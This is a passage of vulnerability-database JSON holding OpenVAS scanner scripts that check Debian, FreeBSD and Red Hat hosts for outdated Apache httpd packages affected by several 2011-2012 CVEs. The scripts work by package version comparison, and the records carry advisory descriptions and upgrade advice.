rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:35", "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "cvss3": {}, "published": "2012-02-12T00:00:00", "type": "openvas", "title": "FreeBSD Ports: apache", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368"], "modified": "2018-10-05T00:00:00", "id": "OPENVAS:136141256231070737", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070737", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_apache20.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID 4b7dbfab-4c6b-11e1-bc16-0023ae8e59f0\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70737\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_version(\"$Revision: 11762 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 07:27:19 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"FreeBSD Ports: apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following package is affected: apache\n\nCVE-2011-3368\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\ninteract with use of (1) RewriteRule and (2) ProxyPassMatch pattern\nmatches for configuration of a reverse proxy, which allows remote\nattackers to send requests to intranet servers via a malformed URI\ncontaining an initial @ (at sign) character.\n\nCVE-2011-3607\nInteger overflow in the ap_pregsub function in server/util.c in the\nApache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when\nthe mod_setenvif module is enabled, allows local users to gain\nprivileges via a .htaccess file with a crafted SetEnvIf directive, in\nconjunction with a crafted HTTP request header, leading to a\nheap-based buffer overflow.\n\nCVE-2011-4317\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision\n1179239 patch is in place, does not properly interact with use of (1)\nRewriteRule and (2) ProxyPassMatch pattern matches for configuration\nof a reverse proxy, which allows remote attackers to send requests to\nintranet servers via a malformed URI containing an @ (at sign)\ncharacter and a : (colon) character in invalid positions. NOTE: this\nvulnerability exists because of an incomplete fix for CVE-2011-3368.\n\nCVE-2012-0021\nThe log_cookie function in mod_log_config.c in the mod_log_config\nmodule in the Apache HTTP Server 2.2.17 through 2.2.21, when a\nthreaded MPM is used, does not properly handle a %{}C format string,\nwhich allows remote attackers to cause a denial of service (daemon\ncrash) via a cookie that lacks both a name and a value.\n\nCVE-2012-0031\nscoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow\nlocal users to cause a denial of service (daemon crash during\nshutdown) or possibly have unspecified other impact by modifying a\ncertain type field within a scoreboard shared memory segment, leading\nto an invalid call to the free function.\n\nCVE-2012-0053\nprotocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not\nproperly restrict header information during construction of Bad\nRequest (aka 400) error documents, which allows remote attackers to\nobtain the values of HTTPOnly cookies via vectors involving a (1) long\nor (2) malformed header in conjunction with crafted web script.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"apache\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2\")>0 && revcomp(a:bver, b:\"2.2.22\")<0) {\n txt += 'Package apache version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-02T21:10:44", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "cvss3": {}, "published": "2012-02-12T00:00:00", "type": "openvas", "title": "FreeBSD Ports: apache", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368"], "modified": "2017-04-24T00:00:00", "id": "OPENVAS:70737", "href": "http://plugins.openvas.org/nasl.php?oid=70737", "sourceData": "#\n#VID 4b7dbfab-4c6b-11e1-bc16-0023ae8e59f0\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 4b7dbfab-4c6b-11e1-bc16-0023ae8e59f0\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: apache\n\nCVE-2011-3368\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\ninteract with use of (1) RewriteRule and (2) ProxyPassMatch pattern\nmatches for configuration of a reverse proxy, which allows remote\nattackers to send requests to intranet servers via a malformed URI\ncontaining an initial @ (at sign) character.\n\nCVE-2011-3607\nInteger overflow in the ap_pregsub function in server/util.c in the\nApache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when\nthe mod_setenvif module is enabled, allows local users to gain\nprivileges via a .htaccess file with a crafted SetEnvIf directive, in\nconjunction with a crafted HTTP request header, leading to a\nheap-based buffer overflow.\n\nCVE-2011-4317\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision\n1179239 patch is in place, does not properly interact with use of (1)\nRewriteRule and (2) ProxyPassMatch pattern matches for configuration\nof a reverse proxy, which allows remote attackers to send requests to\nintranet servers via a malformed URI containing an @ (at sign)\ncharacter and a : (colon) character in invalid positions. NOTE: this\nvulnerability exists because of an incomplete fix for CVE-2011-3368.\n\nCVE-2012-0021\nThe log_cookie function in mod_log_config.c in the mod_log_config\nmodule in the Apache HTTP Server 2.2.17 through 2.2.21, when a\nthreaded MPM is used, does not properly handle a %{}C format string,\nwhich allows remote attackers to cause a denial of service (daemon\ncrash) via a cookie that lacks both a name and a value.\n\nCVE-2012-0031\nscoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow\nlocal users to cause a denial of service (daemon crash during\nshutdown) or possibly have unspecified other impact by modifying a\ncertain type field within a scoreboard shared memory segment, leading\nto an invalid call to the free function.\n\nCVE-2012-0053\nprotocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not\nproperly restrict header information during construction of Bad\nRequest (aka 400) error documents, which allows remote attackers to\nobtain the values of HTTPOnly cookies via vectors involving a (1) long\nor (2) malformed header in conjunction with crafted web script.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(70737);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_version(\"$Revision: 6018 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-24 11:02:24 +0200 (Mon, 24 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 07:27:19 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"FreeBSD Ports: apache\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\ntxt = \"\";\nbver = portver(pkg:\"apache\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2\")>0 && revcomp(a:bver, b:\"2.2.22\")<0) {\n txt += 'Package apache version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:39:19", "description": "The remote host is missing an update to apache2\nannounced via advisory DSA 2405-1.", "cvss3": {}, "published": "2012-02-13T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2405-1 (apache2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053", "CVE-2011-3368"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:136141256231070724", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070724", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2405_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2405-1 (apache2)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70724\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3368\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-13 11:19:29 -0500 (Mon, 13 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2405-1 (apache2)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(5|6|7)\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202405-1\");\n script_tag(name:\"insight\", value:\"Several vulnerabilities have been found in the Apache HTTPD Server:\n\nCVE-2011-3607:\n\nAn integer overflow in ap_pregsub() could allow local attackers to\nexecute arbitrary code at elevated privileges via crafted .htaccess\nfiles.\n\nCVE-2011-3368 CVE-2011-3639 CVE-2011-4317:\n\nThe Apache HTTP Server did not properly validate the request URI for\nproxied requests. In certain reverse proxy configurations using the\nProxyPassMatch directive or using the RewriteRule directive with the\n[P] flag, a remote attacker could make the proxy connect to an\narbitrary server. The could allow the attacker to access internal\nservers that are not otherwise accessible from the outside.\n\nThe three CVE ids denote slightly different variants of the same\nissue.\n\nNote that, even with this issue fixed, it is the responsibility of\nthe administrator to ensure that the regular expression replacement\npattern for the target URI does not allow a client to append arbitrary\nstrings to the host or port parts of the target URI. For example, the\nconfiguration\n\nProxyPassMatch ^/mail(.*) http://example.com$1\n\nis still insecure and should be replaced by one of the following\nconfigurations:\n\nProxyPassMatch ^/mail(/.*) http://example.com$1\nProxyPassMatch ^/mail/(.*) http://example.com/$1\n\nCVE-2012-0031:\n\nAn apache2 child process could cause the parent process to crash\nduring shutdown. This is a violation of the privilege separation\nbetween the apache2 processes and could potentially be used to worsen\nthe impact of other vulnerabilities.\n\nCVE-2012-0053:\n\nThe response message for error code 400 (bad request) could be used to\nexpose httpOnly cookies. This could allow a remote attacker using\ncross site scripting to steal authentication cookies.\n\n\nFor the oldstable distribution (lenny), these problems have been fixed in\nversion apache2 2.2.9-10+lenny12.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion apache2 2.2.16-6+squeeze6\n\nFor the testing distribution (wheezy), these problems will be fixed in\nversion 2.2.22-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.2.22-1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your apache2 packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to apache2\nannounced via advisory DSA 2405-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-src\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:48", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-07-09T00:00:00", "type": "openvas", "title": "RedHat Update for httpd RHSA-2012:0128-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053", "CVE-2011-3368"], "modified": "2019-03-12T00:00:00", "id": "OPENVAS:1361412562310870631", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870631", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2012:0128-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00029.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870631\");\n script_version(\"$Revision: 14114 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-12 12:48:52 +0100 (Tue, 12 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-09 10:37:07 +0530 (Mon, 09 Jul 2012)\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\", \"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"RHSA\", value:\"2012:0128-01\");\n script_name(\"RedHat Update for httpd RHSA-2012:0128-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n script_tag(name:\"affected\", value:\"httpd on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the fix for CVE-2011-3368 (released via\n RHSA-2011:1391) did not completely address the problem. An attacker could\n bypass the fix and make a reverse proxy connect to an arbitrary server not\n directly accessible to the attacker by sending an HTTP version 0.9 request,\n or by using a specially-crafted URI. (CVE-2011-3639, CVE-2011-4317)\n\n The httpd server included the 